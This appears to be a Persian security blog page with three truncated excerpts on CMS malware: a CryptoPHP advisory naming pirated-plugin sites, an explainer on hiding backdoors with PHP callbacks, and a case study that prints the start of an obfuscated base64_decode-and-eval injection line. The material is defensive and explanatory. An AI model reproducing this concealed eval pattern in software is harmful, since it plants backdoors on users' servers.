تهدید امنیتی CryptoPHP و راه مقابله با آن
طبق گزارشات واصله، اخیرا Malware خطرناکی با نام CryptoPHP در پلاگینهای wordpress ،joomla و Drupal شناسایی شده؛ فایلهای social.png ،social2.png و social3.png حاوی این فایل مخرب است. CryptoPHP در قالبها و pluginهایی که لایسنس دارند وجود ندارد، در صورتی که این pluginها را از وب سایتهای غیرمجاز تهیه نمایید احتمال وجود این Malware در آنها بالا است. برخی وب سایتهای غیرمجازی که pluginهای آنها حاوی CryptoPHP بوده است، شناسایی و به شرح ذیر میباشد: anythingforwp.com awesome4wp.com bestnulledscripts.com dailynulled.com freeforwp.com freemiumscripts.com getnulledscripts.com izplace.com mightywordpress.com nulledirectory.com nulledlistings.com nullednet.com nulledstylez.com nulledwp.com nullit.net topnulledownload.com websitesdesignaffordable.com wp-nulled.com yoctotemplates.com CryptoPHP تهدیدی بر علیه وب سرورها است که با استفاده از درب پشتی (به انگلیسی: BackDoor) وب سایتهای مبتنی بر CMS، دسترسی خود را به سرور ایجاد و حفظ میکند. این Malware بعد از آپلود شدن بر روی سرور اقدام به دریافت دستورات کنترلی از سرویس دهنده اصلی مینماید، و دراولین قدم باعث میگردد تا تاثیر منفی در نتایج جستجو وبسایت (BlackSEO) نمایش دادهشود؛ این امر باعث میگردد تا آیپی شما در وب سایتهایی نظیر cbl لیست و در نتیجه آیپی سرور Block (مسدود) میگردد و حداقل پیامدی که مسدود شدن آیپی سرور بههمراه دارد عدم ارسال ایمیلهای سرور خواهد بود. CryptoPHP در قدمهای بعد اقدامات زیر را انجام میدهد: ادغام شدن در […]
توابع PHP Callback راه جدید مخفی کردن Backdoorها
امروزه هکرها و نویسندگان بدافزارها بهدنبال روشهای نوین و پیچیدهای برای مخفی کردن کدهای مخرب خود هستند. یکی از روشهایی که در سالهای اخیر محبوبیت زیادی پیدا کرده، استفاده از توابع callback در زبانهایی مانند PHP است. توابع callback بهطور معمول بهعنوان ابزاری برای مدیریت رویدادها و کاهش پیچیدگی برنامهنویسی استفاده میشوند، اما هنگامی که در دستان نادرستی قرار گیرند، میتوانند به ابزار مناسبی برای پنهان کردن backdoorها تبدیل شوند. در زمینهی امنیت سایبری، Backdoor یا درب پشتی به کدی گفته میشود که بهطور مخفیانه در سیستم یا نرمافزاری قرار میگیرد تا به فرد مهاجم دسترسی غیرمجاز به سیستم بدهد. این دسترسی معمولاً بدون اطلاع یا رضایت کاربر اصلی است و هکر را قادر میسازد تا به دادهها یا منابع سیستم دسترسی پیدا کند، کدهای دیگری اجرا کند یا حتی کنترل کامل سیستم را در دست بگیرد. در این مقاله قصد داریم به بررسی مفهوم callback و چگونگی استفاده از آن در پنهان کردن بدافزارها بپردازیم. Callback چیست؟ به طور کلی، Callback به معنای فراخوانی به عقب است. در برنامهنویسی، توابع callback توابعی هستند که بهعنوان آرگومان به توابع دیگر پاس داده میشوند و سپس در زمان مشخصی توسط تابع دریافتکننده اجرا میگردند. این تکنیک به برنامهنویسان اجازه میدهد تا […]
Backdoorهای پنهان
امروزه دیگر کدهای مخرب پاسخگوی اهداف تولید کنندهگانشان نیستند، چون به سادگی شناسایی و حذف میگردند. کلید موفقیت مهاجمان برای ایجاد بدافزار سودآور؛ در پشتکار و تکرار عملیات تا زمان موفقیت نهفته است. به همین دلیل ما شاهد افزایش نرمافزارهای خلاقانه بر مبنای تکنیکهای Backdoor هستیم. بدافزارهایی که در آنها از روشهای منحصر به فرد و متدهای مبهم برای افزایش طول عمر حملات استفاده میگردد. در ادامه برای معرفی بهتر Backdoor سناریویی که امروز با آن مواجه شدم را شرح خواهم داد: یک نمونه ربات تزریق SPAM میتواند تکه کد ساده ولی حرفهای زیر را به یکی از فایلهای معتبر جوملا اضافه نماید. $stg=”ba”.”se”.”64_d”.”ecode”;eval ($stg(“JHNlcnZlcl91c2VyX2FnZW50ICAgID0gJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KJHNlcnZlcl9yZWZlcmVyICAgICAgID0gQCRfU0VSVkVSWydIVFRQXJFRkVSRVInXTsNCiRzZXJ2ZXJfZm9yd2FyZGVkX2ZvciA9IEAkX1N…. قطعه کد بالا ترفند جدیدی نیست، از این دسته حملات در نسخههای قدیمی سایتساز جوملا بسیار دیده شدهاست و هزاران مطلب در رابطه با آن بر بستر اینترنت وجود دارد. اما این رباتها در اکثر مواقع تنها نیستند و یک همدست برای رسیدن به قصد نهایی خود دارند؛ همدستی مانند یک پوستهی قدیمی PHP که دسترسی دائمی سرور را به مهاجم خواهد داد. این مطلب نیز جدید نیست. Crontab Backdoor: پیدا کردن و حذف قطعه کد مخرب فوق بسیار آسان بود، اما سایت در کمتر از ۱۰ دقیقه مجددا آلوده شد!!! با توجه به اینکه، سایت مثال ما از نسخهی قدیمی جوملا استفاده میکند، […]